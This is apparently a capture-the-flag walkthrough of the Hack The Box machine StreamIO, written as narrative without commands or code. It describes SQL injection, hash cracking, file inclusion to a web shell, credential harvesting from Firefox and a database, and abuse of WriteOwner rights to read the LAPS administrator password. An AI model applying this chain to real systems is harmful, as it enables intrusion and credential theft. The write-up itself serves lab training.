StreamIO - Hack The Box
Enumeration
Nmap
The Nmap scan revealed open ports for SMB, LDAP, Kerberos, HTTP, and HTTPS. Additionally, it identified one domain and one subdomain.
Directory BruteForce
Performed directory brute-forcing on the HTTPS port for both the domain and subdomain, which led to the discovery of additional hidden directories.
Exploitation
SQLi
Discovered search.php under the subdomain, which was vulnerable to SQL injection. Exploiting this vulnerability allowed me to enumerate the database and identify valid user credentials for the website.
Cracking Hashes
The credentials retrieved via SQL injection were hashed. I used hashes.com to crack the hashes and recover the plaintext passwords. Using these, I performed a brute-force attack against the login page and successfully identified valid credentials, which granted access to the admin panel.
Parameter Fuzzing
Within the admin panel, I identified a GET parameter responsible for rendering different pages. Using parameter fuzzing, I discovered an additional undocumented parameter vulnerable to PHP file inclusion. This vulnerability also allowed the inclusion of Base64-encoded PHP payloads, enabling further exploitation.
PHP File Inclusion to RCE
I obtained the Base64-encoded source code of index.php and master.php. The index.php file directly includes files using the previously discovered GET parameter, confirming the Local File Inclusion vulnerability. More critically, master.php accepts an include parameter via POST, which it processes using file_get_contents and eval. This allowed me to remotely supply and execute arbitrary PHP code, ultimately resulting in a web shell on the target system.
Checking MSSQL Databases
From the web shell, I was able to execute the sqlcmd utility and enumerate available databases. I identified a backup database, but initially lacked the necessary permissions to access it. However, upon reviewing the index.php source code, I found a hardcoded database administrator password. Using these credentials, I successfully authenticated and queried the backup database.
Using the database query, I retrieved the user’s password. With these credentials, I accessed a WinRM shell since the user had permission to run PowerShell Remoting (PSRemote).
Privilege Escalation
WinPEAS
Running WinPEAS revealed that LAPS (Local Administrator Password Solution) was enabled on the system. Additionally, stored Firefox credentials were discovered.
BloodHound
I began downloading the stored Firefox credentials for later decryption. While the download was in progress, I ran BloodHound-Python, which revealed that the user JDGodd has privileges that can be leveraged to read the LAPS password.
Firefox Decrypt
Decrypting the Firefox credentials revealed several usernames and passwords. After brute-forcing, I obtained a valid password for the user JDGodd. However, this user did not have permission to use PowerShell Remoting (PSRemote).
Exploiting WriteOwner to Add Member to Group
Although JDGodd lacked PSRemote permissions, I discovered that this user had WriteOwner permissions over the Core Staff group. Using my current session, I created a credential object for JDGodd. Then, leveraging these credentials, I added JDGodd to the Core Staff group, which possessed the ReadLapsPassword permission.
Reading LAPS Password
I then read the LAPS password directly and gained administrative access to the system.
Pwned
The machine was fully compromised.